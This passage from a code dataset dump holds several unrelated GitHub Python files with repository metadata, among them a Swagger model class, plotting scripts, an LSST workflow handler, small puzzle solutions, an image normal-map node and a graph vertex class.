'condition_evals': 'conditionEvals',\n 'error': 'error',\n 'firing': 'firing',\n 'logs': 'logs',\n 'matches': 'matches',\n 'state': 'state',\n 'time_ms': 'timeMs'\n }\n\n def __init__(self, condition_evals=None, error=None, firing=None, logs=None, matches=None, state=None, time_ms=None, _configuration=None): # noqa: E501\n \"\"\"AlertTestResult - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._condition_evals = None\n self._error = None\n self._firing = None\n self._logs = None\n self._matches = None\n self._state = None\n self._time_ms = None\n self.discriminator = None\n\n if condition_evals is not None:\n self.condition_evals = condition_evals\n if error is not None:\n self.error = error\n if firing is not None:\n self.firing = firing\n if logs is not None:\n self.logs = logs\n if matches is not None:\n self.matches = matches\n if state is not None:\n self.state = state\n if time_ms is not None:\n self.time_ms = time_ms\n\n @property\n def condition_evals(self):\n \"\"\"Gets the condition_evals of this AlertTestResult. # noqa: E501\n\n\n :return: The condition_evals of this AlertTestResult. # noqa: E501\n :rtype: str\n \"\"\"\n return self._condition_evals\n\n @condition_evals.setter\n def condition_evals(self, condition_evals):\n \"\"\"Sets the condition_evals of this AlertTestResult.\n\n\n :param condition_evals: The condition_evals of this AlertTestResult. # noqa: E501\n :type: str\n \"\"\"\n\n self._condition_evals = condition_evals\n\n @property\n def error(self):\n \"\"\"Gets the error of this AlertTestResult. # noqa: E501\n\n\n :return: The error of this AlertTestResult. # noqa: E501\n :rtype: str\n \"\"\"\n return self._error\n\n @error.setter\n def error(self, error):\n \"\"\"Sets the error of this AlertTestResult.\n\n\n :param error: The error of this AlertTestResult. # noqa: E501\n :type: str\n \"\"\"\n\n self._error = error\n\n @property\n def firing(self):\n \"\"\"Gets the firing of this AlertTestResult. # noqa: E501\n\n\n :return: The firing of this AlertTestResult. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._firing\n\n @firing.setter\n def firing(self, firing):\n \"\"\"Sets the firing of this AlertTestResult.\n\n\n :param firing: The firing of this AlertTestResult. # noqa: E501\n :type: bool\n \"\"\"\n\n self._firing = firing\n\n @property\n def logs(self):\n \"\"\"Gets the logs of this AlertTestResult. # noqa: E501\n\n\n :return: The logs of this AlertTestResult. 
# noqa: E501\n        :rtype: list[AlertTestResultLog]\n        \"\"\"\n        return self._logs\n\n    @logs.setter\n    def logs(self, logs):\n        \"\"\"Sets the logs of this AlertTestResult.\n\n\n        :param logs: The logs of this AlertTestResult.  # noqa: E501\n        :type: list[AlertTestResultLog]\n        \"\"\"\n\n        self._logs = logs\n\n    @property\n    def matches(self):\n        \"\"\"Gets the matches of this AlertTestResult.  # noqa: E501\n\n\n        :return: The matches of this AlertTestResult.  # noqa: E501\n        :rtype: list[EvalMatch]\n        \"\"\"\n        return self._matches\n\n    @matches.setter\n    def matches(self, matches):\n        \"\"\"Sets the matches of this AlertTestResult.\n\n\n        :param matches: The matches of this AlertTestResult.  # noqa: E501\n        :type: list[EvalMatch]\n        \"\"\"\n\n        self._matches = matches\n\n    @property\n    def state(self):\n        \"\"\"Gets the state of this AlertTestResult.  # noqa: E501\n\n\n        :return: The state of this AlertTestResult.  # noqa: E501\n        :rtype: AlertStateType\n        \"\"\"\n        return self._state\n\n    @state.setter\n    def state(self, state):\n        \"\"\"Sets the state of this AlertTestResult.\n\n\n        :param state: The state of this AlertTestResult.  # noqa: E501\n        :type: AlertStateType\n        \"\"\"\n\n        self._state = state\n\n    @property\n    def time_ms(self):\n        \"\"\"Gets the time_ms of this AlertTestResult.  # noqa: E501\n\n\n        :return: The time_ms of this AlertTestResult.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._time_ms\n\n    @time_ms.setter\n    def time_ms(self, time_ms):\n        \"\"\"Sets the time_ms of this AlertTestResult.\n\n\n        :param time_ms: The time_ms of this AlertTestResult.  # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._time_ms = time_ms\n\n    def to_dict(self):\n        \"\"\"Returns the model properties as a dict\"\"\"\n        result = {}\n\n        for attr, _ in six.iteritems(self.swagger_types):\n            value = getattr(self, attr)\n            if isinstance(value, list):\n                result[attr] = list(map(\n                    lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n                    value\n                ))\n            elif hasattr(value, \"to_dict\"):\n                result[attr] = value.to_dict()\n            elif isinstance(value, dict):\n                result[attr] = dict(map(\n                    lambda item: (item[0], item[1].to_dict())\n                    if hasattr(item[1], \"to_dict\") else item,\n                    value.items()\n                ))\n            else:\n                result[attr] = value\n        if issubclass(AlertTestResult, dict):\n            for key, value in self.items():\n                result[key] = value\n\n        return result\n\n    def to_str(self):\n        \"\"\"Returns the string representation of the model\"\"\"\n        return pprint.pformat(self.to_dict())\n\n    def __repr__(self):\n        \"\"\"For `print` and `pprint`\"\"\"\n        return self.to_str()\n\n    def __eq__(self, other):\n        \"\"\"Returns true if both objects are equal\"\"\"\n        if not isinstance(other, AlertTestResult):\n            return False\n\n        return self.to_dict() == other.to_dict()\n\n    def __ne__(self, other):\n        \"\"\"Returns true if both objects are not equal\"\"\"\n        if not isinstance(other, AlertTestResult):\n            return True\n\n        return self.to_dict() != other.to_dict()\n","repo_name":"midokura/grafana-sync","sub_path":"swagger_client/models/alert_test_result.py","file_name":"alert_test_result.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1627068837","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\nfrom matplotlib.gridspec import GridSpec\nfrom scipy.stats import gaussian_kde\nfrom tqdm import tqdm\nimport warnings\nfrom sklearn import linear_model\nfrom matplotlib.colors import LinearSegmentedColormap\n\n# Escalate warnings to errors\nwarnings.filterwarnings(\"error\")\n\n# Load the data\ndata = []\nwith 
open('metrics.csv', 'r') as csv_file:\n    csv_reader = csv.reader(csv_file, delimiter=',')\n    [data.append([np.array([int(col) for col in row]), len(row)]) for row in csv_reader if len(row) != 0]\n\naccuracy = []\n# median of non-zero values\nmedianNoneZero = []\n# max non-zero value\nmaxNoneZero = []\nfor arr, _len in tqdm(data, desc='Calculating'):\n    a = (arr == 0).sum()\n    # skip if all values are zero or no value is zero\n    if arr.sum() == 0 or a == 0:\n        continue\n    accuracy.append(a/_len)\n    medianNoneZero.append(np.median(arr[arr != 0]))\n    maxNoneZero.append(np.max(arr[arr != 0]))\n\nransac = linear_model.RANSACRegressor(min_samples=200, max_trials=1000)\naccuracy = np.array(accuracy).reshape(-1, 1)\nmedianNoneZero = np.array(medianNoneZero).reshape(-1, 1)\nmaxNoneZero = np.array(maxNoneZero).reshape(-1, 1)\n\n# \"Viridis-like\" colormap with white background\nwhite_viridis = LinearSegmentedColormap.from_list('white_viridis', [\n    (0, '#ffffff'),\n    (1e-20, '#440053'),\n    (0.2, '#404388'),\n    (0.4, '#2a788e'),\n    (0.6, '#21a784'),\n    (0.8, '#78d151'),\n    (1, '#fde624'),\n], N=256)\n\n# Plot the data\n# fig = plt.figure(figsize=(10, 5))\n\nfig = plt.figure(figsize=(10, 5), constrained_layout=True)\ngs = GridSpec(3, 3, figure=fig)\n\n# Histogram plotting\nprint('Plotting histograms')\nplt.subplot(gs[0, :])\nbinwidth = 500\nbins = list(range(0, int(np.max(maxNoneZero)) + binwidth, binwidth))\nplt.hist(maxNoneZero,\n         bins=bins,\n         alpha=0.5,\n         label='Max',\n         density = True\n         )\nplt.plot(bins, gaussian_kde(maxNoneZero.reshape(-1))(bins), label='Max KDE')\nbins = range(0, int(np.max(medianNoneZero)) + binwidth, binwidth)\nplt.hist(medianNoneZero,\n         bins=bins,\n         alpha=0.5,\n         label='Median',\n         density = True\n         )\nplt.grid()\nplt.title('Non-zero values')\nplt.yscale('log')\nplt.legend(loc='upper right')\n# plt.show()\n# exit()\n# Scatter plots\nprint(\"Plotting scatter plots 1\")\nax = plt.subplot(2, 2, 3)\n# Fit linear regression via least squares with numpy.polyfit\n# It returns a slope (b) and intercept (a)\n# deg=1 means linear fit (i.e. 
polynomial of degree 1)\nb, a = np.polyfit(accuracy.reshape(-1), medianNoneZero.reshape(-1), deg=1)\nransac.fit(accuracy, medianNoneZero)\n# Create a sequence of 1000 numbers from 0 to 1\nxseq = np.linspace(0, 1, num=1000)\nline_y_ransac = ransac.predict(xseq.reshape(-1, 1))\n# Plot regression line\nplt.plot(xseq, a + b * xseq,\n         color=\"b\",\n         lw=1\n         ,label='Least squares')\nplt.plot(xseq, line_y_ransac,\n         color=\"r\",\n         lw=1\n         ,label='RANSAC'\n         )\n\nxy = np.vstack([accuracy.reshape(-1), medianNoneZero.reshape(-1)])\nz = gaussian_kde(xy)(xy)\n\nplt.scatter(accuracy, medianNoneZero, s=1, c=z)\nymin = 0.9\nax.set_ylim(ymin=ymin)\nplt.title('Accuracy vs Median of non-zero values')\nplt.yscale('log')\nplt.legend(loc='lower left')\n\nprint(\"Plotting scatter plots 2\")\nax = plt.subplot(2, 2, 4)\n# Fit linear regression via least squares with numpy.polyfit\n# It returns a slope (b) and intercept (a)\n# deg=1 means linear fit (i.e. polynomial of degree 1)\nb, a = np.polyfit(accuracy.reshape(-1), maxNoneZero.reshape(-1), deg=1)\nransac.fit(accuracy, maxNoneZero)\n# Create a sequence of 1000 numbers from 0 to 1\nxseq = np.linspace(0, 1, num=1000)\nline_y_ransac = ransac.predict(xseq.reshape(-1, 1))\n# Plot regression line\nplt.plot(xseq, a + b * xseq,\n         color=\"b\",\n         lw=1\n         ,label='Least squares'\n         )\nplt.plot(xseq, line_y_ransac,\n         color=\"r\",\n         lw=1\n         ,label='RANSAC'\n         )\nxy = np.vstack([accuracy.reshape(-1), maxNoneZero.reshape(-1)])\nz = gaussian_kde(xy)(xy)\n\nplt.scatter(accuracy, maxNoneZero, s=1, c=z, cmap=white_viridis)\nplt.title('Accuracy vs Max of non-zero values')\nplt.yscale('log')\nplt.legend(loc='lower left')\nax.set_ylim(ymin=ymin)\nplt.show()\n","repo_name":"biddls/Text-gen-Using-BERT","sub_path":"vis/advvis.py","file_name":"advvis.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"283005120","text":"import socket\n\nHEADER = 64\nPORT = 1313\n# SERVER = \"192.168.56.1\"\n# get the IP address of the server machine dynamically\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\nFORMAT = 'utf-8'\nDISCONNECT_MSG = \"!DISCONNECT\"\n","repo_name":"dhia-ammar/PSR","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"784087467","text":"import os\nfrom typing import Any, Iterable, Optional\n\nfrom lsst.daf.butler import Butler\n\nfrom lsst.cm.tools.core.butler_utils import build_data_queries, fake_data_queries\nfrom lsst.cm.tools.core.db_interface import DbInterface\nfrom lsst.cm.tools.core.handler import Handler\nfrom lsst.cm.tools.core.utils import LevelEnum, StatusEnum\nfrom lsst.cm.tools.db.campaign import Campaign\nfrom lsst.cm.tools.db.entry_handler import GenericEntryHandler\nfrom lsst.cm.tools.db.group import Group\nfrom lsst.cm.tools.db.step import Step\n\n\nclass StepHandler(GenericEntryHandler):\n    \"\"\"Step level callback handler\n\n    Provides interface functions.\n\n    Derived classes will have to:\n\n    1. 
provide the parameters for the Group callback handler with the\n    `group_iterator` function.\n    \"\"\"\n\n    config_block = \"step\"\n\n    fullname_template = os.path.join(\"{production_name}\", \"{campaign_name}\", \"{step_name}\")\n\n    group_handler_class: Optional[str]\n\n    level = LevelEnum.step\n\n    def insert(self, dbi: DbInterface, parent: Campaign, **kwargs: Any) -> Step:\n        step_name = self.get_kwarg_value(\"step_name\", **kwargs)\n        # coll_source = self.get_kwarg_value(\"coll_source\", **kwargs)\n        coll_source = kwargs.get(\"coll_source\", parent.coll_in)\n        insert_fields = dict(\n            name=step_name,\n            fullname=self.get_fullname(**kwargs),\n            p_id=parent.p_.id,\n            c_id=parent.id,\n            config_id=parent.config_id,\n            frag_id=self._fragment_id,\n            data_query=kwargs.get(\"data_query\"),\n            coll_in=coll_source,\n            coll_source=coll_source,\n            bps_yaml_template=self.get_config_var(\"bps_yaml_template\", parent.bps_yaml_template, **kwargs),\n            bps_script_template=self.get_config_var(\n                \"bps_script_template\", parent.bps_script_template, **kwargs\n            ),\n            lsst_version=self.get_config_var(\"lsst_version\", parent.lsst_version, **kwargs),\n            lsst_custom_setup=self.get_config_var(\"lsst_custom_setup\", parent.lsst_custom_setup, **kwargs),\n            pipeline_yaml=self.get_config_var(\"pipeline_yaml\", None, **kwargs),\n            status=StatusEnum.waiting,\n        )\n        extra_fields = dict(\n            prod_base_url=parent.prod_base_url,\n            root_coll=parent.root_coll,\n            production_name=parent.p_.name,\n            campaign_name=parent.name,\n            step_name=step_name,\n        )\n        coll_names = self.coll_names(insert_fields, **extra_fields)\n        insert_fields.update(**coll_names)\n        return Step.insert_values(dbi, **insert_fields)\n\n    def make_children(self, dbi: DbInterface, entry: Any) -> StatusEnum:\n        self.make_groups(dbi, entry)\n        return StatusEnum.populating\n\n    def make_groups(self, dbi: DbInterface, entry: Step) -> dict[str, Group]:\n        \"\"\"Called to set up the groups needed to process this step\n\n        Parameters\n        ----------\n        dbi : DbInterface\n            Interface to the database we update\n\n        entry : Step\n            The entry we are preparing\n\n        Returns\n        -------\n        groups : dict[str, Group]\n            The newly made Groups\n        \"\"\"\n        out_dict = {}\n        group_config_block = self.get_config_var(\"group_config\", \"group\")\n        group_handler = entry.get_sub_handler(group_config_block)\n        insert_fields = dict(\n            production_name=entry.p_.name,\n            campaign_name=entry.c_.name,\n            step_name=entry.name,\n            coll_source=entry.coll_in,\n        )\n        for group_kwargs in self.group_iterator(dbi, entry, **insert_fields):\n            insert_fields.update(**group_kwargs)\n            out_dict[group_kwargs[\"group_name\"]] = group_handler.insert(dbi, entry, **insert_fields)\n        return out_dict\n\n    def group_iterator(self, dbi: DbInterface, entry: Step, **kwargs: Any) -> Iterable:\n        \"\"\"Iterator over the parameters of the Groups for this step\n\n        Parameters\n        ----------\n        dbi : DbInterface\n            Interface to the database we update\n\n        entry : Step\n            The entry we are preparing\n\n        Keywords\n        --------\n        These can be any additional fields used to parameterize the groups\n\n        Returns\n        -------\n        group_configs : Iterable[dict[str, Any]]\n            Iterator over the configs\n        \"\"\"\n        out_dict = dict(\n            production_name=entry.p_.name,\n            campaign_name=entry.c_.name,\n            step_name=entry.name,\n        )\n        data_query_base = self.config.get(\"data_query_base\", \"\")\n        split_args = self.config.get(\"split_args\", {})\n        split_vals = self.config.get(\"split_vals\", {})\n        if split_args:\n            butler = Butler(\n                entry.butler_repo,\n                collections=[entry.coll_source],\n            )\n            if Handler.script_method.value > 0:\n                data_queries = build_data_queries(butler, 
**split_args)\n else:\n data_queries = fake_data_queries(\n field=split_args.get(\"field\"), min_queries=split_args.get(\"min_queries\")\n )\n elif split_vals:\n split_field = split_vals[\"field\"]\n split_list = split_vals[\"values\"]\n data_queries = [f\"{split_field} in ({split_value_})\" for split_value_ in split_list]\n else:\n data_queries = [None]\n for i, dq_ in enumerate(data_queries):\n data_query = data_query_base\n if dq_ is not None:\n data_query += f\" AND {dq_}\"\n out_dict.update(\n group_name=f\"group{i}\",\n data_query=data_query,\n )\n yield out_dict\n","repo_name":"lsst-dm/cm_tools","sub_path":"src/lsst/cm/tools/db/step_handler.py","file_name":"step_handler.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26613553483","text":"from collections import deque\n\nn = int(input())\nstart = []\nG = [[0] * 2020 for _ in range(2020)]\nmer = 1005\nfor i in range(n):\n x, y = map(int, input().split())\n x += mer\n y += mer\n G[x][y] = 1\n start.append([x, y])\n\n\nvisited = [[False] * 2020 for _ in range(2020)]\ndx = [-1, -1, 0, 0, 1, 1]\ndy = [-1, 0, -1, 1, 0, 1]\nque = deque()\nans = 0\nfor x, y in start:\n if not visited[x][y]:\n visited[x][y] = True\n que.append([x, y])\n ans += 1\n\n while 0 < len(que):\n nox, noy = que.popleft()\n for i in range(6):\n nx = nox + dx[i]\n ny = noy + dy[i]\n if G[nx][ny] == 1 and not visited[nx][ny]:\n visited[nx][ny] = True\n que.append([nx, ny])\n\nprint(ans)\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-269/D_BFS.py","file_name":"D_BFS.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1354243818","text":"#!/usr/bin/python\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\n# instruction: change i from 0 to 2 to select plotting different function\ni = 2\n\ndef wireframe(ax, f, m):\n xs = range(m)\n ys = range(m)\n xs, ys = np.meshgrid(xs, ys)\n zs = f(xs, ys)\n ax.plot_wireframe(xs, ys, zs)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\nfs = [lambda x, y: x + y, lambda x, y: pow(2, x) + y, lambda x, y: x*x + y*y]\n\nwireframe(ax, fs[i], 50)\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Z')\n#ax.legend()\n\nplt.show()\n","repo_name":"liuxinyu95/AlgoXY","sub_path":"search/binary-search/src/saddleback_frame.py","file_name":"saddleback_frame.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":5880,"dataset":"github-code","pt":"37"} +{"seq_id":"73492140908","text":"import numpy as np\nimport scipy.ndimage\nimport scipy.misc\nfrom PIL import ImageFilter\n\nfrom GimelStudio import api\n\n# FIXME: hack!\nfrom GimelStudio.utils.image import ArrayFromImage, ArrayToImage\n\n\nclass ToNormalMapNode(api.NodeBase):\n def __init__(self, _id):\n api.NodeBase.__init__(self, _id)\n\n def SmoothGaussian(self, im, sigma):\n \"\"\" Blurs the normals. \"\"\"\n if sigma == 0:\n return im\n\n im_smooth = im.astype(float)\n kernel_x = np.arange(-3 * sigma, 3 * sigma + 1).astype(float)\n kernel_x = np.exp((-(kernel_x**2)) / (2 * (sigma**2)))\n\n im_smooth = scipy.ndimage.convolve(im_smooth, kernel_x[np.newaxis])\n\n im_smooth = scipy.ndimage.convolve(im_smooth, kernel_x[np.newaxis].T)\n\n return im_smooth\n\n def Gradient(self, im_smooth):\n \"\"\" Calculates the gradient for the normal map. 
\"\"\"\n gradient_x = im_smooth.astype(float)\n gradient_y = im_smooth.astype(float)\n\n kernel = np.arange(-1, 2).astype(float)\n kernel = - kernel / 2\n\n gradient_x = scipy.ndimage.convolve(gradient_x, kernel[np.newaxis])\n gradient_y = scipy.ndimage.convolve(gradient_y, kernel[np.newaxis].T)\n\n return gradient_x, gradient_y\n\n def Sobel(self, im_smooth):\n \"\"\" Calculates another type of gradient for the normal map. \"\"\"\n gradient_x = im_smooth.astype(float)\n gradient_y = im_smooth.astype(float)\n\n kernel = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])\n\n gradient_x = scipy.ndimage.convolve(gradient_x, kernel)\n gradient_y = scipy.ndimage.convolve(gradient_y, kernel.T)\n\n return gradient_x, gradient_y\n\n def ComputeNormalMap(self, gradient_x, gradient_y, intensity=1):\n \"\"\" Calculates the normals of an image and returns a normal map. \"\"\"\n width = gradient_x.shape[1]\n height = gradient_x.shape[0]\n max_x = np.max(gradient_x)\n max_y = np.max(gradient_y)\n\n max_value = max_x\n\n if max_y > max_x:\n max_value = max_y\n\n normal_map = np.zeros((height, width, 3), dtype=np.float32)\n\n intensity = 1 / intensity\n\n strength = max_value / (max_value * intensity)\n\n normal_map[..., 0] = gradient_x / max_value\n normal_map[..., 1] = gradient_y / max_value\n normal_map[..., 2] = 1 / strength\n\n norm = np.sqrt(np.power(normal_map[..., 0], 2) +\n np.power(normal_map[..., 1], 2) + np.power(normal_map[..., 2], 2))\n\n normal_map[..., 0] /= norm\n normal_map[..., 1] /= norm\n normal_map[..., 2] /= norm\n\n normal_map *= 0.5\n normal_map += 0.5\n\n return normal_map\n\n @property\n def NodeMeta(self):\n meta_info = {\n \"label\": \"To Normal Map\",\n \"author\": \"Correct Syntax\",\n \"version\": (2, 2, 0),\n \"supported_app_version\": (0, 5, 0),\n \"category\": \"CONVERT\",\n \"description\": \"Converts the image into a normal map texture for use in 3D.\",\n }\n return meta_info\n\n def NodeInitProps(self):\n p1 = api.PositiveIntegerProp(\n idname=\"Sigma\",\n default=1,\n min_val=1,\n max_val=25,\n widget=api.SLIDER_WIDGET,\n label=\"Sigma:\",\n )\n p2 = api.PositiveIntegerProp(\n idname=\"Intensity\",\n default=1,\n min_val=1,\n max_val=25,\n widget=api.SLIDER_WIDGET,\n label=\"Intensity:\",\n )\n\n self.NodeAddProp(p1)\n self.NodeAddProp(p2)\n\n def NodeInitParams(self):\n p = api.RenderImageParam('Image')\n\n self.NodeAddParam(p)\n\n def NodeEvaluation(self, eval_info):\n image1 = eval_info.EvaluateParameter('Image')\n sigma_val = eval_info.EvaluateProperty('Sigma')\n intensity_val = eval_info.EvaluateProperty('Intensity')\n\n # Convert the current image data to an array that scipy can use\n im = ArrayFromImage(image1.GetImage())\n\n # Create the image\n if im.ndim == 3:\n im_grey = np.zeros((im.shape[0], im.shape[1])).astype(float)\n im_grey = (im[..., 0] * 0.3 + im[..., 1] * 0.6 + im[..., 2] * 0.1)\n im = im_grey\n\n im_smooth = self.SmoothGaussian(im, sigma_val)\n sobel_x, sobel_y = self.Sobel(im_smooth)\n\n # Calculate the normal map\n generated_normal_map = self.ComputeNormalMap(\n sobel_x,\n sobel_y,\n intensity_val\n )\n\n image = api.RenderImage()\n image.SetAsImage(\n ArrayToImage(generated_normal_map).convert('RGBA')\n )\n self.NodeSetThumb(image.GetImage())\n return image\n\n\napi.RegisterNode(ToNormalMapNode, 
\"corenode_tonormalmap\")\n","repo_name":"GimelStudio/Gimel-Studio","sub_path":"src/GimelStudio/corenodes/convert/to_normal_map_node.py","file_name":"to_normal_map_node.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"37"} +{"seq_id":"73332370348","text":"i=0\nf=5\nc=10\nwhile c>0:\n u=int(input(\"enter number\"))\n d=0\n if u==f:\n print(\"your guessing is correct\")\n print(\"congrates\")\n break\n elif u0:\n print(\"remaining chance\",r)\n else:\n print(\"finished\")\n elif f0:\n print(\"remaining chance\",r)\n else:\n print(\"finished\")\n i+=1\nelse:\n print(\"your chance is finished try again\")","repo_name":"gauriindalkar/while-loop","sub_path":"interview guessing game.py","file_name":"interview guessing game.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41427353891","text":"class Solution:\n def kidsWithCandies(self, candies: List[int], extraCandies: int) -> List[bool]:\n tempCandies = candies[:]\n tempCandies.sort(reverse=True)\n highestPossibleCandies = tempCandies[0]\n output = []\n for candy in candies:\n if (candy + extraCandies) >= highestPossibleCandies:\n output.append(True)\n else:\n output.append(False)\n return output","repo_name":"BhavyaShah99/leet-code-hackerrank-practice","sub_path":"greatest-num-candies.py","file_name":"greatest-num-candies.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14429158128","text":"import numpy as np\nimport pygame\n\nfrom visualizer.utilities.utils import SCREEN_DIM\nfrom visualizer.utilities.utils import scaled_value\n\n\nclass Point:\n def __init__(self, trajectory, screen):\n self.trajectory = trajectory\n self.screen = screen\n self.length = 10\n\n def createPoints(self):\n startPoint = self.draw(self.trajectory[0].getX(), -self.trajectory[0].getY())\n endPoint = self.draw(self.trajectory[-1].getX(), -self.trajectory[-1].getY())\n return startPoint, endPoint\n\n def draw(self, x, y):\n point = pygame.draw.circle(self.screen, (255, 0, 0),\n [np.clip((scaled_value(x, isRelative=True)), (-SCREEN_DIM + self.length),\n (SCREEN_DIM - self.length))\n , np.clip(scaled_value(y, isRelative=True), (-SCREEN_DIM + self.length),\n (SCREEN_DIM - self.length))],\n self.length)\n return point\n","repo_name":"amangalampalli/SplineTrajectoryGenerator","sub_path":"visualizer/sprites/point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27993034061","text":"from polygon import WebSocketClient\nfrom polygon.websocket.models import WebSocketMessage\nfrom typing import List\nimport asyncio\n\nc = WebSocketClient(subscriptions=[\"T.*\"])\n\n\nasync def handle_msg(msgs: List[WebSocketMessage]):\n for m in msgs:\n print(m)\n\n\nasync def timeout():\n await asyncio.sleep(1)\n print(\"unsubscribe_all\")\n c.unsubscribe_all()\n await asyncio.sleep(1)\n print(\"close\")\n await c.close()\n\n\nasync def main():\n await asyncio.gather(c.connect(handle_msg), timeout())\n\n\nasyncio.run(main())\n","repo_name":"polygon-io/client-python","sub_path":"examples/websocket/async.py","file_name":"async.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":597,"dataset":"github-code","pt":"37"} 
+{"seq_id":"19297226983","text":"import unittest\nimport csv\nfrom challenge2 import sort_csv, sorting_func\n\ndef compare_function(row1, row2):\n\tresult1 = sorting_func(row1)\n\tresult2 = sorting_func(row2)\n\tif result1[0] > result2[0]:\n\t\treturn False\n\tif result1[0] < result2[0]:\n\t\treturn True\n\t#compare year\n\tif result1[1] < result2[1]:\n\t\treturn True\n\tif result1[1] > result2[1]:\n\t\treturn False\n\t# compare month if year is equal\n\tif result1[2] > result2[2]:\n\t\treturn False\n\tif result1[2] < result2[2]:\n\t\treturn True\n\t# compare day if month is equal\n\tif result1[3] > result2[3]:\n\t\treturn False\n\tif result1[3] <= result2[3]:\n\t\treturn True\n\n\n\nclass Challenge2_Test(unittest.TestCase):\n\n\tdef test_sorting_function(self):\n\t\tdata_row1 = [\"1\",\"33\",\"98\",\"25\",\"50\",\"2001-05-18\"]\n\t\tresult1 = (1, 2001, 5, 18)\n\t\tdata_row2 = [\"1\",\"5\",\"26\",\"14\",\"72\",\"1/17/18\"]\n\t\tresult2 = (1, 2018, 1, 17)\n\t\t\n\t\tself.assertEqual(sorting_func(data_row1), result1)\n\t\tself.assertEqual(sorting_func(data_row2), result2)\n\n\tdef test_sorting_large_data(self):\n\t\tsort_csv('large_data.csv', 'large_data_sorted.csv')\n\t\twith open('large_data_sorted.csv', 'r') as csv_file:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\t\t\tnext(csv_reader)\n\t\t\tprevious_line = next(csv_reader)\n\t\t\tfor line in csv_reader:\n\t\t\t\tcurrent_line = line\n\t\t\t\tresult = compare_function(previous_line, current_line)\n\t\t\t\tself.assertEqual(result, True)\n\t\t\t\tprevious_line = current_line\n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"poonesh/code-challenge","sub_path":"challenge2/challenge2Test.py","file_name":"challenge2Test.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36069745444","text":"__author__ = \"Michail Xyntarakis\"\n__company__ = \"Parsons Brinckerhoff\"\n__email__ = \"xyntarakis@pbworld.com\"\n__license__ = \"GPL\"\n\nimport logging\nfrom itertools import imap,chain\nfrom math import fabs, atan, atan2, pi, sqrt, acos, sin, cos\nimport random\nimport sys\n\nfrom roadNetwork.edge import Edge\nfrom roadNetwork.errors import GraphError\n\nclass Vertex(object):\n\n def __init__(self, id_, x, y):\n \n self.id = id_\n self.iid = self.id\n self.x = x\n self.y = y \n self._emanatingEdges = []\n self._incidentEdges = []\n self._edgesClockwise = []\n \n def __str__(self):\n\n return \"%s\\t%f\\t%f\" % (self.id, self.x, self.y)\n\n def addOutEdge(self, edge):\n \"\"\"Add the emanating instance of Edge (or subclass) instance to the list \n of emanating links\"\"\"\n\n if not edge.startVertex.id == self.id:\n raise GraphError(\"Edge %s does not start from vertex %s\" % (edge.iid_, self.id))\n\n if edge in self._emanatingEdges:\n raise GraphError(\"Edge %s already emanates from the vertex %s\" % \n (edge.iid_, self.id))\n \n #identify the position to insert the edge\n position = 0\n for i, emanatingEdge in enumerate(self.iterOutEdges()):\n if edge.isClockwise(emanatingEdge):\n position = i + 1\n self._emanatingEdges.insert(position, edge)\n self._edgesClockwise = sorted(chain(self._incidentEdges, \n self._emanatingEdges),\n key = lambda e: self.getOrientation(e.midpoint2))\n\n def addInEdge(self, edge):\n \"\"\"Add the incident instance of Edge (or subclass) to the list\n of incident edges\"\"\"\n \n if not edge.endVertex.id == self.id:\n raise GraphError(\"Edge %s does not end to vertex %s\" % (edge.iid_, 
self.id))\n\n        if edge in self._incidentEdges:\n            raise GraphError(\"Edge %s is already incident to vertex %s\" % \n                             (edge.iid, self.id))\n\n        \n        position = 0\n        for i, incidentEdge in enumerate(self.iterInEdges()):\n            if edge.isCounterClockwise(incidentEdge):\n                position = i + 1\n\n        self._incidentEdges.insert(position, edge)\n        self._edgesClockwise = sorted(chain(self._incidentEdges, \n                                            self._emanatingEdges),\n                                      key = lambda e: self.getOrientation(e.midpoint2))\n\n\n    def _sortEdges(self):\n        \"\"\"Sorts the edges clockwise\"\"\"\n        self._edgesClockwise = sorted(chain(self._incidentEdges, \n                                            self._emanatingEdges),\n                                      key = lambda e: self.getOrientation(e.midpoint2)) \n        \n    def _deleteOutEdge(self, edge):\n        \n        #raise Exception(\"Not implemented yet\")\n        